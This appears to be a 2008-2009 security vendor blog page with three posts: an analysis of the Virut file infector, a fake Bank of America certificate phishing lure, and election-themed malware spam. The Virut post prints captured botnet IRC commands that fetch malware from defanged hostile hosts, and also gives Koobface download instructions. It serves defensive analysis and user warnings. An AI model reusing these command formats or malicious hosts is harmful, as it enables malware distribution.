Archive for the ‘Rootkit’ Category

« Older Entries

Virut Distributing Koobface, Ad-Clickers and Spambots

Tuesday, May 26th, 2009

Virut is a nasty file infector that has been actively updated and distributed for a few years. Yes, you read that correctly. Actively updated and distributed for a few years now. A system infected with this stuff often needs to be reformatted altogether. ThreatFire has been doing its part (for the past couple of years) to prevent the new variants on users’ systems even when the traditional Av scanners have failed to keep up.

Are viruses the thing of yesteryear? Not at all. Is it another 29A, another group of kids looking for some thrills and recognition of their virus writing skills? No. What we find is that the hosting server, the downloads, and the multiple layers of effort are well orchestrated and financially motivated.

The family uses all sorts of tricks to distribute itself and many other components. Much has already been written on its changing infection, encryption, memory residence, injection, html file appending, and hooking techniques. But what is the group behind it up to now?
This summary will put together a few more key points on the threat’s current activity and its hosts. The threat itself comes from a number of servers and delivers a variety of malware. We’ll see that it is responsible for far more than infected files and Irc traffic, including adware, rootkits, password stealers, worms and spambots.

Virut’s current strain of executable infector is highly prevalent. The ThreatFire community has prevented tens of thousands of a couple of the newest Virut variants over the past couple of months. In fact, this executable infector is redeveloped quickly and often, and has been known to be buggy so that disinfection routines by the major Av vendors may end up corrupting the executable files that are meant to be cleaned when detected.

DO NOT VISIT THE MALICIOUS WEBSITES DESCRIBED HERE…

The first server that the current active Virut variant attempts to connect with is irc.zief.pl, oddly enough, over port 80 for its IRC session. It joins one of the channels there to receive private messages instructing it to download more malware:

NICK xxx
USER xxx. . :#xxx Service Pack 3
JOIN #.xxx

:u. PRIVMSG xxx:!get hxxp://cock.8866. org:88/files/adx.gif (Spyware downloader)
:u. PRIVMSG xxx:!get hxxp://dl.guarddog2009. com/cw.exe (Koobface variant)
:u. PRIVMSG xxx:!get hxxp://goasi. cn/ex/a.php (serves “load.exe” malicious downloader)
:u. PRIVMSG xxx:!get hxxp://85.114.131. 69/ad2.exe (malicious ad-popper)
PING :l.
PONG :l.
PING :l.
PONG :l.

Of those domains, it is interesting that the “dl.guarddog2009.com” is actively serving Koobface worm variants and ad popupers, considering that they are peddling scareware/rogueware from the same ip. Avoid it:

Once running, these additional pieces of malware download other nastiness in the background:
hxxp://avhtm.8866. org/files/av.htm (spambot dropper)
a POST is sent to main15052009. com/achcheck.php
hxxp://74.52.164. 210/pk/bb021908.exe (malicious downloader)

another POST is sent up to main15052009. com/ld/gen.php, with a recognizable Koobface response:
#PID=xxx
START|hxxp://www.i-site. ph/1/6244.exe (Bho dropper)
START|hxxp://www.i-site. ph/1/nfr.exe (proxy component)
WAIT|120
#BLACKLABEL
EXIT

hxxp://ji-u. cn/506.exe <-- hxxp://goasi. cn/dll/abb.txt (renamed to reader_s.exe and run, an updated Virut backdoor variant)

An unusual user-agent rears its head:
GET /ad2.exe HTTP/1.0 (malicious ad-popper listed above)
User-Agent: Download
Host: 85.114.131.69
Pragma: no-cache
(Incidentally, 85.114.131.69 is the host to s2.zief. pl and dl.guarddog2009. com.)

Additional files downloaded:
hxxp://ipkipk.3322. org/ipk.exe (downloader/adclick component)
hxxp://xz.wanggui. com/mem322.exe (downloader for password stealers)
hxxp://www.dofulfill . net/loadersvc.exe

All the while, in the background, multiple phantom queries are sent out to multiple servers, in an effort to increase click traffic at various sites, including job sites.

And then comes the spam. Infected machines spew spam containing messages like
“If you don’t feel like a complete person because you can’t afford luxury things to look stylish and elegant, you can forget about this feeling. We offer you fantastic deals on fantastic watches.”
A link is included that takes you to a “group” at a major provider, where knockoff watches and bags appear to be for sale. A click on an image redirects the user to sites like “trylamp. com”. Often, other pieces of spam carry offers for pills of all kinds.

Posted in Adware, Koobface, Rootkit, Spam, Virut | No Comments »

Certificate Installation Failure?

Friday, March 13th, 2009

Always be on the lookout for phony warnings and messages from banks and other financial institutions. Even if it is someone claiming to be a banking employee and they know some of your information, do not give out personal information or install unusual applications when you are being contacted over email. You can always contact your bank by calling them back or visiting the web site you were informed of when you opened your account to take care of your business.

An example email blast sent out right now with the subject line “Bank of America Security Department: How to Update Software” warns the receiving user that “Automatic Installation failed for Bank of America certificate component” and provides a bank-sounding link, persuading the user to visit the site. A user could easily be confused by the url, as seen in a browser bar here:


Notice that the link is not “bofa.com” or “bankofamerica.com”, but instead, “767certificate.com” (many other confused urls are being used in this ongoing scheme). When the link is visited with a browser, the center of the deceptively accurate page presents a demo video and automatically prompts the users to install an “Adobeflashplayer.exe“. As can be seen at this ThreatExpert report, this malware is not a Flash installer. This screenshot shows the certificate warning “You have not been permitted to access the Bank of America Direct login page because your browser did not provide a valid digital certificate” and the accompanying popup for the “Adobeflashplayer.exe” malware download. DO NOT download and run this file:

ThreatFire prevents many behaviors exhibited by this malware as Spyware.Ursnif when protecting a clean system. When ThreatFire is installed on system previously infected with the spyware and its rootkit, ThreatFire will identify the hidden new_drv.sys rootkit driver as Rootkit.Agent and hidden 9129837.exe (randomly named) executable copied to c:\windows, and associated registry keys when a rootkit Intelliscan is run. ThreatFire also quarantines it all properly when selected.

Posted in Crimeware, Rootkit, Social Engineering, Spam, Undetected malware | No Comments »

Obama elected U.S. President 44 in a Landslide Victory, but…

Wednesday, November 5th, 2008

any spammed email message claiming to provide a link to information about U.S. culture or foreign policy may likely provide a trojan with rootkit capabilities.

In one of the most prevalent social engineering schemes of this half of the year, users clicking on a spammed link are directed to a web page with a phony video. The user’s browser then displays a request to update their Adobe Flash version to play the video. This time, the malicious executable’s download name is “Adobe_Flash9.exe“. Users seem to be enticed into clicking links with the text “Proceed to the election results news page” and then running this file.
As always, avoid interacting with messages and links that seem questionable.

Another interesting Obama-related file just hitting our community this afternoon has been an infected executable containing a copy of President-elect Barack Obama’s entire acceptance speech: “obama’s presidential speech.exe“. This one just appears to be run from a system previously infected with a virus with the family name of “Nakuru” or “Kespo”. Symantec’s research team calls it W32.Tupofse.B.
The exe drops the original copy of the .doc file to disk before dropping other viral code, like kspoold.exe. When run, the original .doc file is opened and the entire speech appears:
“If there is anyone out there who still doubts that America is a place where all things are possible; who still wonders if the dream of our founders is alive in our time; who still questions the power of our democracy, tonight is your answer…”
Be sure to pay attention to file extensions before double-clicking on files. The icon for the file is altered by the virus so that it appears to be associated with Word, with a .doc extension, but it only has a .exe extension. Here is an image of the file, on a system that doesn’t have Microsoft Word installed on it (the icon normally never appears for .doc files, the wordpad icon should appear by default):

Posted in Rootkit, Social Engineering, Spam, Trojan, cybercrime | No Comments »

« Older Entries